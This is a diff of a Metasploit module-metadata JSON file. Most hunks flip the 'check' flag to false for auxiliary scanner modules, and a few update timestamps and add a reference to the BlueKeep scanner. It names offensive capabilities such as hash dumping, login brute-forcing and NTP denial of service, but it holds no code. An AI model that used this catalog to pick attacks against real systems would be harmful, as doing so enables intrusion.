@@ -32868,7 +33349,7 @@
     "path": "/modules/auxiliary/scanner/misc/ibm_mq_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/ibm_mq_login",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32907,7 +33388,7 @@
     "path": "/modules/auxiliary/scanner/misc/java_jmx_server.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/java_jmx_server",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32947,7 +33428,7 @@
     "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/java_rmi_server",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -32984,7 +33465,7 @@
     "path": "/modules/auxiliary/scanner/misc/oki_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/oki_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33021,7 +33502,7 @@
     "path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/poisonivy_control_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33059,7 +33540,7 @@
     "path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/raysharp_dvr_passwords",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33096,7 +33577,7 @@
     "path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/rosewill_rxs3211_passwords",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33136,7 +33617,7 @@
     "path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/sercomm_backdoor_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33173,7 +33654,7 @@
     "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/sunrpc_portmapper",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33213,7 +33694,7 @@
     "path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/zenworks_preboot_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33251,7 +33732,7 @@
     "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mongodb/mongodb_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -33288,7 +33769,7 @@
     "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
     "is_install_path": true,
     "ref_name": "scanner/motorola/timbuktu_udp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33326,7 +33807,7 @@
     "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
     "is_install_path": true,
     "ref_name": "scanner/mqtt/connect",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -33363,7 +33844,7 @@
     "path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/msf/msf_rpc_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -33410,7 +33891,7 @@
     "path": "/modules/auxiliary/scanner/msf/msf_web_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/msf/msf_web_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -33453,7 +33934,7 @@
     "path": "/modules/auxiliary/scanner/msmail/exchange_enum.go",
     "is_install_path": true,
     "ref_name": "scanner/msmail/exchange_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33496,7 +33977,7 @@
     "path": "/modules/auxiliary/scanner/msmail/host_id.go",
     "is_install_path": true,
     "ref_name": "scanner/msmail/host_id",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33539,7 +34020,7 @@
     "path": "/modules/auxiliary/scanner/msmail/onprem_enum.go",
     "is_install_path": true,
     "ref_name": "scanner/msmail/onprem_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33584,7 +34065,7 @@
     "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_hashdump",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33629,7 +34110,7 @@
     "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -33674,7 +34155,7 @@
     "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_ping",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33719,7 +34200,7 @@
     "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_schemadump",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33759,7 +34240,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -33797,7 +34278,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_file_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -33834,7 +34315,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_hashdump",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33871,7 +34352,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -33908,7 +34389,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_schemadump",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33945,7 +34426,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -33982,7 +34463,7 @@
     "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_writable_dirs",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -34019,7 +34500,7 @@
     "path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb",
     "is_install_path": true,
     "ref_name": "scanner/natpmp/natpmp_portscan",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34056,7 +34537,7 @@
     "path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/nessus/nessus_ntp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34102,7 +34583,7 @@
     "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/nessus/nessus_rest_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34148,7 +34629,7 @@
     "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/nessus/nessus_xmlrpc_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34194,7 +34675,7 @@
     "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb",
     "is_install_path": true,
     "ref_name": "scanner/nessus/nessus_xmlrpc_ping",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34231,7 +34712,7 @@
     "path": "/modules/auxiliary/scanner/netbios/nbname.rb",
     "is_install_path": true,
     "ref_name": "scanner/netbios/nbname",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34277,7 +34758,7 @@
     "path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/nexpose/nexpose_api_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34315,7 +34796,7 @@
     "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
     "is_install_path": true,
     "ref_name": "scanner/nfs/nfsmount",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34355,7 +34836,7 @@
     "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/nntp/nntp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34395,7 +34876,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_monlist",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34436,7 +34917,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_nak_to_the_future",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34475,7 +34956,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_peer_list_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34514,7 +34995,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_peer_list_sum_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34553,7 +35034,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_readvar",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34592,7 +35073,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_req_nonce_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34631,7 +35112,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_reslist_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34670,7 +35151,7 @@
     "path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb",
     "is_install_path": true,
     "ref_name": "scanner/ntp/ntp_unsettrap_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34716,7 +35197,7 @@
     "path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/openvas/openvas_gsad_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34753,7 +35234,7 @@
     "path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/openvas/openvas_omp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34790,7 +35271,7 @@
     "path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/openvas/openvas_otp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34836,7 +35317,7 @@
     "path": "/modules/auxiliary/scanner/oracle/emc_sid.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/emc_sid",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -34883,7 +35364,7 @@
     "path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/isqlplus_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34930,7 +35411,7 @@
     "path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/isqlplus_sidbrute",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -34967,7 +35448,7 @@
     "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/oracle_hashdump",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -35003,11 +35484,11 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/oracle_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -35044,7 +35525,7 @@
     "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/sid_brute",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -35082,7 +35563,7 @@
     "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/sid_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35128,7 +35609,7 @@
     "path": "/modules/auxiliary/scanner/oracle/spy_sid.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/spy_sid",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35165,7 +35646,7 @@
     "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/tnslsnr_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35203,7 +35684,7 @@
     "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/tnspoison_checker",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35249,7 +35730,7 @@
     "path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/xdb_sid",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35296,7 +35777,7 @@
     "path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/xdb_sid_brute",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35333,7 +35814,7 @@
     "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/pcanywhere/pcanywhere_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -35370,7 +35851,7 @@
     "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb",
     "is_install_path": true,
     "ref_name": "scanner/pcanywhere/pcanywhere_tcp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35407,7 +35888,7 @@
     "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb",
     "is_install_path": true,
     "ref_name": "scanner/pcanywhere/pcanywhere_udp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35445,7 +35926,7 @@
     "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/pop3/pop3_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -35482,7 +35963,7 @@
     "path": "/modules/auxiliary/scanner/pop3/pop3_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/pop3/pop3_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35521,7 +36002,7 @@
     "path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb",
     "is_install_path": true,
     "ref_name": "scanner/portmap/portmap_amp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35558,7 +36039,7 @@
     "path": "/modules/auxiliary/scanner/portscan/ack.rb",
     "is_install_path": true,
     "ref_name": "scanner/portscan/ack",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35596,7 +36077,7 @@
     "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
     "is_install_path": true,
     "ref_name": "scanner/portscan/ftpbounce",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35633,7 +36114,7 @@
     "path": "/modules/auxiliary/scanner/portscan/syn.rb",
     "is_install_path": true,
     "ref_name": "scanner/portscan/syn",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35671,7 +36152,7 @@
     "path": "/modules/auxiliary/scanner/portscan/tcp.rb",
     "is_install_path": true,
     "ref_name": "scanner/portscan/tcp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35708,7 +36189,7 @@
     "path": "/modules/auxiliary/scanner/portscan/xmas.rb",
     "is_install_path": true,
     "ref_name": "scanner/portscan/xmas",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35746,7 +36227,7 @@
     "path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb",
     "is_install_path": true,
     "ref_name": "scanner/postgres/postgres_dbname_flag_injection",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -35783,7 +36264,7 @@
     "path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/postgres/postgres_hashdump",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -35818,11 +36299,11 @@
       "postgres"
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/postgres/postgres_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -35859,7 +36340,7 @@
     "path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
     "is_install_path": true,
     "ref_name": "scanner/postgres/postgres_schemadump",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -35896,7 +36377,7 @@
     "path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/postgres/postgres_version",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -35941,11 +36422,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-02-22 17:01:49 +0000",
+    "mod_time": "2019-10-05 14:22:18 +0000",
     "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/canon_iradv_pwd_extract",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -35986,7 +36467,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_delete_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36027,7 +36508,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_download_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_download_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36068,7 +36549,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_env_vars",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36109,7 +36590,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_list_dir",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36150,7 +36631,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_list_volumes",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36191,7 +36672,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_ready_message",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36232,7 +36713,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_upload_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36273,7 +36754,7 @@
     "path": "/modules/auxiliary/scanner/printer/printer_version_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/printer/printer_version_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36310,7 +36791,7 @@
     "path": "/modules/auxiliary/scanner/quake/server_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/quake/server_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36335,7 +36816,8 @@
     "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability\n        by binding the MS_T120 channel outside of its normal slot and sending\n        non-DoS packets which respond differently on patched and vulnerable hosts.\n        It can optionally trigger the DoS vulnerability.",
     "references": [
       "CVE-2019-0708",
-      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708"
+      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708",
+      "URL-https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html"
     ],
     "platform": "",
     "arch": "",
@@ -36347,7 +36829,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-09-24 08:48:47 +0000",
+    "mod_time": "2019-11-11 17:33:10 +0000",
     "path": "/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb",
     "is_install_path": true,
     "ref_name": "scanner/rdp/cve_2019_0708_bluekeep",
@@ -36436,7 +36918,7 @@
     "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/rdp/rdp_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36476,7 +36958,7 @@
     "path": "/modules/auxiliary/scanner/redis/file_upload.rb",
     "is_install_path": true,
     "ref_name": "scanner/redis/file_upload",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36513,7 +36995,7 @@
     "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/redis/redis_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -36551,7 +37033,7 @@
     "path": "/modules/auxiliary/scanner/redis/redis_server.rb",
     "is_install_path": true,
     "ref_name": "scanner/redis/redis_server",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36625,7 +37107,7 @@
     "path": "/modules/auxiliary/scanner/rogue/rogue_send.rb",
     "is_install_path": true,
     "ref_name": "scanner/rogue/rogue_send",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36663,7 +37145,7 @@
     "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/rservices/rexec_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -36701,7 +37183,7 @@
     "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/rservices/rlogin_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -36739,7 +37221,7 @@
     "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/rservices/rsh_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -36778,7 +37260,7 @@
     "path": "/modules/auxiliary/scanner/rsync/modules_list.rb",
     "is_install_path": true,
     "ref_name": "scanner/rsync/modules_list",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36826,7 +37308,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_ctc_verb_tampering_user_mgmt",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -36877,7 +37359,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_hostctrl_getcomputersystem",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36925,7 +37407,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_icf_public_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -36971,7 +37453,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_icm_urlscan",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37018,7 +37500,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_abaplog",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37061,11 +37543,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-05 21:45:05 +0000",
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_brute_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -37112,7 +37594,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_extractusers",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37159,7 +37641,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37206,7 +37688,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_getenv",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37254,7 +37736,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
     "is_install_path": true,
     "ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -37302,7 +37784,7 @@
     "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
     "is_install_path": true,
